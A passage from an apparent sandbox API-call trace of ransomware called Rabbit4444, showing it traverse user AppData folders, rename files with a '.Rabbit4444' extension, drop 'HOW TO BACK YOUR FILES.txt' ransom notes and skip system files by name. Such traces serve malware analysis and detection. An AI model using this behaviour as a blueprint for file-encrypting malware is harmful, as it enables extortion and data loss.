lpString2=".ini") returned 1 [0053.620] lstrlenW (lpString=".sys") returned 4 [0053.620] lstrcmpiW (lpString1=".mdw", lpString2=".sys") returned -1 [0053.620] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\System.mdw" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\system.mdw"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.620] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.620] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14493085778) returned 1 [0053.620] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=126976) returned 1 [0053.620] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0053.620] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0053.620] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1f300, lpName=0x0) returned 0x298 [0053.621] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1f300) returned 0x70000 [0053.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0053.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0053.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0053.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0053.628] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14493836515) returned 1 [0053.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0053.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0053.628] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.629] CloseHandle (hObject=0x298) returned 1 [0053.629] CloseHandle (hObject=0x278) returned 1 [0053.629] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\System.mdw.Rabbit4444") returned 70 [0053.629] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\System.mdw" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\system.mdw"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\System.mdw.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\system.mdw.rabbit4444"), dwFlags=0x1) returned 1 [0053.631] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3387db8b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3387db8b, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x338a3dd1, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System.mdw", cAlternateFileName="")) returned 0 [0053.631] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0053.631] lstrcpyW (in: lpString1=0x130eb9a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.631] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.631] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.631] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.632] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.632] CloseHandle (hObject=0x278) returned 1 [0053.633] CloseHandle (hObject=0x27c) returned 1 [0053.633] GetCurrentThreadId () returned 0xd98 [0053.633] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6530 [0053.633] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia" [0053.633] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115808 | out: hHeap=0xe0000) returned 1 [0053.633] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6528 | out: hHeap=0xe0000) returned 1 [0053.633] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia" [0053.633] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\" [0053.633] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\.BFC0E91B00AE8A0620D3" [0053.633] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.634] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.637] FlushFileBuffers (hFile=0x27c) returned 1 [0053.638] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.638] CloseHandle (hObject=0x27c) returned 1 [0053.639] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia") returned 42 [0053.639] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.639] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe94a554a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0053.639] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.639] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.639] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.639] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.639] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe94a554a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.639] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.639] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.639] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.639] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.639] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.639] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe94a554a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe94a554a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe94a554a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.639] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.639] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.639] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cf090, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53ed8d1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53ed8d1, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0053.639] lstrcmpiW (lpString1="Flash Player", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.639] lstrcmpiW (lpString1="Flash Player", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.639] lstrcmpiW (lpString1="Flash Player", lpString2="Rabbit4444.exe") returned -1 [0053.639] lstrcmpiW (lpString1="Flash Player", lpString2=".") returned 1 [0053.639] lstrcmpiW (lpString1="Flash Player", lpString2="..") returned 1 [0053.639] lstrcmpiW (lpString1="Flash Player", lpString2="windows") returned -1 [0053.639] lstrcmpiW (lpString1="Flash Player", lpString2="bootmgr") returned 1 [0053.639] lstrcmpiW (lpString1="Flash Player", lpString2="pagefile.sys") returned -1 [0053.640] lstrcmpiW (lpString1="Flash Player", lpString2="boot") returned 1 [0053.640] lstrcmpiW (lpString1="Flash Player", lpString2="ids.txt") returned -1 [0053.640] lstrcmpiW (lpString1="Flash Player", lpString2="NTUSER.DAT") returned -1 [0053.640] lstrcpyW (in: lpString1=0x130eb8e, lpString2="Flash Player" | out: lpString1="Flash Player") returned="Flash Player" [0053.640] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0053.640] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x70) returned 0x117c20 [0053.640] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6670 [0053.640] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cf090, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53ed8d1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53ed8d1, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 0 [0053.640] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0053.640] lstrcpyW (in: lpString1=0x130eb8e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.640] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.643] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.643] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.643] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.643] CloseHandle (hObject=0x278) returned 1 [0053.643] CloseHandle (hObject=0x27c) returned 1 [0053.643] GetCurrentThreadId () returned 0xd98 [0053.643] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0053.643] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player" [0053.643] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0053.643] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0053.643] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player" [0053.643] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\" [0053.643] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\.BFC0E91B00AE8A0620D3" [0053.644] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.648] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.651] FlushFileBuffers (hFile=0x27c) returned 1 [0053.652] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.652] CloseHandle (hObject=0x27c) returned 1 [0053.652] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player") returned 55 [0053.652] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.652] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cf090, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53ed8d1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe94cb805, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0053.652] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.652] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.653] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.653] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.653] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cf090, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53ed8d1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe94cb805, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.653] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.653] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.653] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.653] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.653] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.653] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53d03fd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53db3d7, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53db3d7, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="#SharedObjects", cAlternateFileName="#SHARE~1")) returned 1 [0053.653] lstrcmpiW (lpString1="#SharedObjects", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.653] lstrcmpiW (lpString1="#SharedObjects", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.653] lstrcmpiW (lpString1="#SharedObjects", lpString2="Rabbit4444.exe") returned -1 [0053.653] lstrcmpiW (lpString1="#SharedObjects", lpString2=".") returned -1 [0053.653] lstrcmpiW (lpString1="#SharedObjects", lpString2="..") returned -1 [0053.653] lstrcmpiW (lpString1="#SharedObjects", lpString2="windows") returned -1 [0053.653] lstrcmpiW (lpString1="#SharedObjects", lpString2="bootmgr") returned -1 [0053.653] lstrcmpiW (lpString1="#SharedObjects", lpString2="pagefile.sys") returned -1 [0053.653] lstrcmpiW (lpString1="#SharedObjects", lpString2="boot") returned -1 [0053.653] lstrcmpiW (lpString1="#SharedObjects", lpString2="ids.txt") returned -1 [0053.653] lstrcmpiW (lpString1="#SharedObjects", lpString2="NTUSER.DAT") returned -1 [0053.653] lstrcpyW (in: lpString1=0x130eba8, lpString2="#SharedObjects" | out: lpString1="#SharedObjects") returned="#SharedObjects" [0053.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0053.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8e) returned 0x11eb00 [0053.653] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6670 [0053.653] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe94cb805, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe94cb805, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe94cb805, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.653] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.653] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.653] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53ed8d1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f0003, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53f0003, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="macromedia.com", cAlternateFileName="MACROM~1.COM")) returned 1 [0053.653] lstrcmpiW (lpString1="macromedia.com", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.653] lstrcmpiW (lpString1="macromedia.com", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.653] lstrcmpiW (lpString1="macromedia.com", lpString2="Rabbit4444.exe") returned -1 [0053.653] lstrcmpiW (lpString1="macromedia.com", lpString2=".") returned 1 [0053.653] lstrcmpiW (lpString1="macromedia.com", lpString2="..") returned 1 [0053.654] lstrcmpiW (lpString1="macromedia.com", lpString2="windows") returned -1 [0053.654] lstrcmpiW (lpString1="macromedia.com", lpString2="bootmgr") returned 1 [0053.654] lstrcmpiW (lpString1="macromedia.com", lpString2="pagefile.sys") returned -1 [0053.654] lstrcmpiW (lpString1="macromedia.com", lpString2="boot") returned 1 [0053.654] lstrcmpiW (lpString1="macromedia.com", lpString2="ids.txt") returned 1 [0053.654] lstrcmpiW (lpString1="macromedia.com", lpString2="NTUSER.DAT") returned -1 [0053.654] lstrcpyW (in: lpString1=0x130eba8, lpString2="macromedia.com" | out: lpString1="macromedia.com") returned="macromedia.com" [0053.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0053.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8e) returned 0x11e770 [0053.654] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf63b0 [0053.654] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53ed8d1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f0003, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53f0003, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="macromedia.com", cAlternateFileName="MACROM~1.COM")) returned 0 [0053.654] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0053.654] lstrcpyW (in: lpString1=0x130eba8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.654] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.654] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.654] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.655] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.655] CloseHandle (hObject=0x278) returned 1 [0053.655] CloseHandle (hObject=0x27c) returned 1 [0053.655] GetCurrentThreadId () returned 0xd98 [0053.655] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0053.655] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0053.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e770 | out: hHeap=0xe0000) returned 1 [0053.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0053.655] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0053.655] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\" [0053.655] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2=".BFC0E91B00AE8A0620D3" | out: 